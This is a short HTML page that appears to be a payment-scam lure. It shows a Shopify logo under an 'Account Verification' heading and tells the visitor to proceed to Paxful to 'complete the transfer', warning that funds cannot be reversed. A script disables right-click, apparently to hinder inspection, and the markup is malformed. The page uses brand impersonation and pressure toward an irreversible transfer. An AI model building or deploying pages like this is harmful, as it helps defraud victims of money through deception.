<!DOCTYPE html>
<html>
<head>
 <img src="static/shopify.png">


  <center>
    <title>Account Verification</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            width: 95%;
            height: 100%;
            font-family: Arial, sans-serif;
            text-align: center;
            margin-top: 100px;
            display: block;
            background-color: white;
        }
        
        h1 {
            color: #333;
        }
        
        .confirm-button {
            background-color: #4CAF50;
            border: none;
            color: white;
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 20px;
            margin-top: 20px;
            cursor: pointer;
            width: 80%;
            height: 60px;
            border-radius: 12px;
            box-sizing: border-box; padding: 10px;
        }
    </style>
</head>

<body>
    <wbr> 
<div>

    <h1>Account Verification and Authorization</h1>
    <p>Proceed to  paxful  to  finish the confirmation and complete the transfer</p>
    
    <p><b><wbr>NB: Ensure the  payment details are correct before proceeding because once you  complete this step the transaction will be completed successfully and funds cannot be reversed<wbr></b></p>

</div>
</wbr>
</body></center>

    
    <button class="confirm-button" onclick="confirmPayment()">Proceed Paxful</button>
    
    <script>
        function confirmPayment() {
            // Add your payment confirmation logic here
            // For this example, we'll simply display an alert
            window.location.href = "accounts.paxful.com";
        }
    </script>
     <script>
 document.getElementsByTagName("html")[0].setAttribute("oncontextmenu", "return false");
    </script>
</body>
</center>

</html>
